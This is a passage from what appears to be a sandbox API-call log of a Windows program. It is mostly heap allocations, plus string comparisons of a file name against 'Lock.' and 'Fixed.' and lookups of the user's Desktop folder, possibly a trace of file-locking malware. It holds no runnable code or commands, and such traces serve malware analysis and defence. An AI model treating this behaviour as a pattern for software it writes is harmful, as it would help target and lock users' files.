Size=0x8) returned 0x2a72748 [0105.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vY9PyxRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9PyxRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9PyxRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PyxRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yxRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xRY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RY3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0105.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0105.831] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77c88 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vY9PyxRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9PyxRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9PyxRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PyxRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yxRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xRY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RY3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0105.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0105.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.833] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0105.833] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0105.834] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0105.834] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61e8 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0105.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0105.835] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.835] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6610 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6610 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71eb8 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0105.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0105.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0105.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0105.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0105.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0105.838] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0105.838] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0105.838] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0105.838] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.838] RtlAllocateHeap 